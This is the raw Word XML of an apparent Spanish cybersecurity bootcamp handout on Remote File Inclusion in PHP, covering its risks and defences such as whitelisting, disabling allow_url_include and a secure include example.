    <w:p w14:paraId="26C5DBFD" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Intento insuficiente de prevenir RFI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0F9543B1" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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l código intenta eliminar "http://" y "https://" de la entrada del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52A6EA" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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in embargo, esta medida es fácilmente eludible y no previene eficazmente los ataques RFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA5DC0" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Falta de validación robust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094B5EDA" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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o hay una validación adecuada para asegurar que el archivo a incluir sea local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B828B57" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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osible ejecución de código remot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4A2860A5" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Si este código se usa para incluir archivos (por ejemplo, con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nclude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$file)), podría permitir la ejecución de código PHP remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A108431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Riesgos de RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC1502" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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jecución de código arbitrari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 Un atacante podría incluir y ejecutar código PHP malicioso desde un servidor remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AEB2F7" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Compromiso del servidor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 RFI puede llevar a la toma de control completa del servidor web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03145AEB" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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lastRenderedPageBreak/>
        <w:t>Robo de dato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 El código remoto podría acceder a información sensible en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF08ACB" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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ropagación de malware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 El servidor comprometido podría ser usado para distribuir malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0958AC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Recomendaciones para Mitigar RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B82E5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Usar una lista blanca de archivos permitido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1AF95ED0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finir un conjunto fijo de archivos que pueden ser incluidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB7204F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erificar que la entrada del usuario coincida exactamente con uno de estos archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F733A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Deshabilitar la inclusión de URL remota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47D47414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En php.ini, establecer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llow_url_include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= Off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C75EE6B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sto previene la inclusión de archivos remotos a través de URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13485FD5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Validación estricta de entrad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5A912380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Usar funciones de filtrado de PHP como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ilter_</w:t>
      </w:r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var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 con las banderas apropiadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0BDD64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r expresiones regulares para validar estrictamente la entrada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B38EA6C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Usar rutas absolutas para la inclusión de archivo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7185E156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Definir una constante con la ruta base de los archivos incluibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3822919C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catenar esta ruta base con el nombre del archivo validado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2138E0C5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Implementar un mapeo segur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1E13A9E7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rear un array asociativo que mapee identificadores seguros a nombres de archivo reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7369CF91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anitización de la salida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3D4CE6E9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Usar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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htmlspecialchars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 al mostrar contenido para prevenir XSS en caso de que se logre incluir contenido malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A434E96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Manejo de errores adecuad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132AB772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o mostrar mensajes de error detallados que puedan revelar información del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC59EB" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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rincipio de menor privilegio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02A26D7B" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Ejecutar el script PHP con los mínimos privilegios necesarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4ECABF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jemplo de Implementación Segura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4CAAB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lastRenderedPageBreak/>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FE553" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B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py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de</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="162D8DE0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E45649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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8935A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defin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BASE_PATH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,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/var/www/html/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safe_includes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/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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29E0C1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53A005BB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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08CAEC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home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&gt;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home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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155DA078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about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&gt;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bout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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1E22D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contact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&gt;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  <w:proofErr w:type="spellStart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contact.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEB63B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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891E621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60363AA8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=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sset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$_GET[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page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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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)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?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$_GET[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page'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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 :</w:t>
      </w:r>
      <w:proofErr w:type="gram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home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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75217D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</w:p>
    <w:p w14:paraId="779285CF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f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(</w:t>
      </w:r>
      <w:proofErr w:type="spell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sset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[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])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&amp;&amp;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file_</w:t>
      </w:r>
      <w:proofErr w:type="gram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exist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B76B01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BASE_PATH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.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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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[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)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B244864" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="008C0D19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   </w:t>
      </w:r>
      <w:proofErr w:type="gram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nclud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B76B01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BASE_PATH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.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8C0D19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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C0D19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allowed_pages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C0D19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[</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0D19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$page</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0D19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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F9F746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} </w:t>
      </w:r>
      <w:proofErr w:type="spell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eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15901532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    </w:t>
      </w:r>
      <w:r w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="A0A1A7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>// Manejar error o redirigir a página por defecto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389CDB2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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="A626A4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include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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="B76B01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BASE_PATH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4078F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.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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="50A14F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'404.php'</w:t>
      </w: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val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A4F7C9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383A42"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC2B6DC" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B0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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="383A42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color w:val="E45649"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDCB6C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xplicación de la Implementación Segura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1BC3D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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e define una ruta base absoluta (BASE_PATH) para todos los archivos incluibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF2703" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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e utiliza un array asociativo ($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) para mapear identificadores seguros a nombres de archivo reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33485011" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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La entrada del usuario se verifica contra las claves del array $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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allowed_pages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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78347BEE" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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e comprueba la existencia del archivo antes de incluirlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10835EE9" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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e usa una ruta absoluta para la inclusión, combinando BASE_PATH con el nombre del archivo validado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCD774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Medidas Adicionales de Mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25424992" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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lastRenderedPageBreak/>
        <w:t>Configuración del servidor web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7B0D2400" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Configurar el servidor web (por ejemplo, Apache) para limitar el acceso a directorios sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B1C85" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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s-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Uso de Web Application Firewalls (WAF)</w:t>
      </w:r>
      <w:r w:rsidRPr="006866E5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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1F25C" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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r un WAF puede ayudar a detectar y bloquear intentos de RFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB774E" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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ctualizaciones regulares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2A4CDAE8" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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antener actualizado el sistema operativo, el servidor web y PHP para protegerse contra vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176BB97" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Monitoreo y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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logging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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23076A5F" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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r un sistema de monitoreo para detectar actividades sospechosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E88822B" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Mantener logs detallados de las solicitudes al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6ACA7" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Educación y concienciación</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A2E0D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Formar a los desarrolladores en prácticas de codificación segura y concienciarlos sobre los riesgos de RFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD58915" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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6866E5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Implementando estas medidas, se puede mitigar significativamente el riesgo de ataques RFI y mejorar la seguridad general de la aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E96448" w14:textId="77777777" w:rsidR="006866E5" w:rsidRDefault="006866E5" w:rsidP="00415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0B42D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRDefault="006866E5" w:rsidP="00415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2F7A6A" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="001872EF" w:rsidRDefault="006866E5" w:rsidP="00415A5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866E5" w:rsidRPr="001872E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71F81" w14:textId="77777777" w:rsidR="00A35EF1" w:rsidRDefault="00A35EF1" w:rsidP="005A6BA4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6913504D" w14:textId="77777777" w:rsidR="00A35EF1" w:rsidRDefault="00A35EF1" w:rsidP="005A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86DA1" w14:textId="1B65D9A1" w:rsidR="005A6BA4" w:rsidRPr="005A6BA4" w:rsidRDefault="005A6BA4" w:rsidP="005A6BA4">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005A6BA4">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>BOOTCAMP DE CIBERSEGURIDAD – THE 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E96FE" w14:textId="77777777" w:rsidR="00A35EF1" w:rsidRDefault="00A35EF1" w:rsidP="005A6BA4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37498866" w14:textId="77777777" w:rsidR="00A35EF1" w:rsidRDefault="00A35EF1" w:rsidP="005A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8B9E" w14:textId="694EBFFD" w:rsidR="005A6BA4" w:rsidRPr="005A6BA4" w:rsidRDefault="005A6BA4" w:rsidP="006F4E56">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005A6BA4">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>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24E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5EE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D4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="834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87D02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FD0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70DAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DC45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34A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1A8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13822"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79CA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56038"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F4C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207A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A874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F3A86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDB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36E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87A6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07CB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF76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A5DF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6C4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6732F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="619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FD4EBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC2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152A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D82A6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D5A2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79B0D0D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B144F9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="029C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E16AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5340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F6D1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1E8C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4BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BADC0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0B4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="928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880E05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0ED0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814C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B58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120117">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="327056051">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1794707369">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="449322832">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="639191184">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1991904441">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1081179089">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1918436674">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="428818235">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="851456480">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1108550678">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="39745796">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="203375773">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="961349203">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1715230949">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="128741794">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1990668405">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1343897807">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2120685136">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1119764290">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1701542537">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1531451079">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1216625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05"/>
    <w:rsid w:val="000041C8"/>
    <w:rsid w:val="00012521"/>
    <w:rsid w:val="00064B1D"/>
    <w:rsid w:val="000B7FCA"/>
    <w:rsid w:val="00130368"/>
    <w:rsid w:val="0016165F"/>
    <w:rsid w:val="001872EF"/>
    <w:rsid w:val="001A1D47"/>
    <w:rsid w:val="0023669D"/>
    <w:rsid w:val="002B75D0"/>
    <w:rsid w:val="002D5149"/>
    <w:rsid w:val="002F77CB"/>
    <w:rsid w:val="003225CE"/>
    <w:rsid w:val="00376305"/>
    <w:rsid w:val="003B0E1B"/>
    <w:rsid w:val="003B5B52"/>
    <w:rsid w:val="004007F0"/>
    <w:rsid w:val="00415A52"/>
    <w:rsid w:val="00423A7E"/>
    <w:rsid w:val="00457DBA"/>
    <w:rsid w:val="004A32A6"/>
    <w:rsid w:val="004C4D86"/>
    <w:rsid w:val="00505170"/>
    <w:rsid w:val="00526D35"/>
    <w:rsid w:val="00581D32"/>
    <w:rsid w:val="005A6BA4"/>
    <w:rsid w:val="005B069E"/>
    <w:rsid w:val="005B6A2D"/>
    <w:rsid w:val="005C2BE0"/>
    <w:rsid w:val="005D58F3"/>
    <w:rsid w:val="00651C2A"/>
    <w:rsid w:val="00661039"/>
    <w:rsid w:val="00681346"/>
    <w:rsid w:val="006866E5"/>
    <w:rsid w:val="006922AB"/>
    <w:rsid w:val="006F4E56"/>
    <w:rsid w:val="0075506C"/>
    <w:rsid w:val="0076054D"/>
    <w:rsid w:val="007702D5"/>
    <w:rsid w:val="00817437"/>
    <w:rsid w:val="00846D6A"/>
    <w:rsid w:val="008853CE"/>
    <w:rsid w:val="008C0D19"/>
    <w:rsid w:val="008F3BDA"/>
    <w:rsid w:val="009B26AE"/>
    <w:rsid w:val="009D6B8B"/>
    <w:rsid w:val="009E23B9"/>
    <w:rsid w:val="009E370B"/>
    <w:rsid w:val="009E47DE"/>
    <w:rsid w:val="00A35EF1"/>
    <w:rsid w:val="00A707A9"/>
    <w:rsid w:val="00AB3548"/>
    <w:rsid w:val="00AB5CCF"/>
    <w:rsid w:val="00AF1617"/>
    <w:rsid w:val="00AF4585"/>
    <w:rsid w:val="00BB16A7"/>
    <w:rsid w:val="00BF130D"/>
    <w:rsid w:val="00BF4F85"/>
    <w:rsid w:val="00D77602"/>
    <w:rsid w:val="00DD619C"/>
    <w:rsid w:val="00E4562D"/>
    <w:rsid w:val="00E62B2A"/>
    <w:rsid w:val="00E8359B"/>
    <w:rsid w:val="00E86623"/>
    <w:rsid w:val="00ED25DB"/>
    <w:rsid w:val="00F1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8FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3C69D891-8646-40D8-B27A-E2853FD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87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1872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Ttulo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Ttulo5Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001872E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8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1D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1D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BA4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A6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BA4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textonotapie">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextonotapieCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AF45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5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458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1872EF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872EF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1872EF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87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872E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1872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872EF"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00885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1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1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9970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5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87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28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60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79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91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0A5-51CB-4CDA-A2EE-3402485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3</Pages>
  <Words>192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 Manuel Martinez Barbera</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Victor  Manuel Martinez Barbera</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-04T02:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-14T05:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>